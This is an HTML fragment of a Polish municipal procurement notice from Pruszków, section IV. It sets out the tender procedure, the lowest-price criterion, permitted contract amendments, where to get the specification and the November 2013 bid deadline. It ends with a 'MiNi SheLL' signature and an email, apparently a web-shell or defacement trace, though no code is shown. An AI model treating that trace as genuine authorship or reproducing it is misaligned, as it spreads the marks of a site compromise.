<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w następujących okolicznościach tj.:
- konieczności wprowadzenia zmian projektowych lub technologicznych.
- z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na  
   niezgodności dokumentacji z przepisami prawa,
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych 
   przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
- z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez 
   doświadczonego Wykonawcę robót,
- z powodu niemożliwych do przewidzenia niekorzystnych warunków atmosferycznych które mają wpływ 
   na realizację zamówienia publicznego,
- z powodu przedłużenia się uzgodnień zewnętrznych przez podmioty do tego upoważnione. 
- z powodu wystąpienia okoliczności nie zawinionych przez strony,  których nie można było wcześniej  
   przewidzieć,
- z powodu zmiany kluczowego personelu Wykonawcy lub Zamawiającego.
- z powodu wystąpienia obiektywnych zmian ocenianych jako korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pruszkow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> cena wersji papierowej - 215,00 PLN
Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
Biuro Zamówień Publicznych
pok. 113.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.11.2013 godzina 12:00, miejsce: Urząd Miejski w Pruszkowie
ul. Kraszewskiego 14/16
pok. 25.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com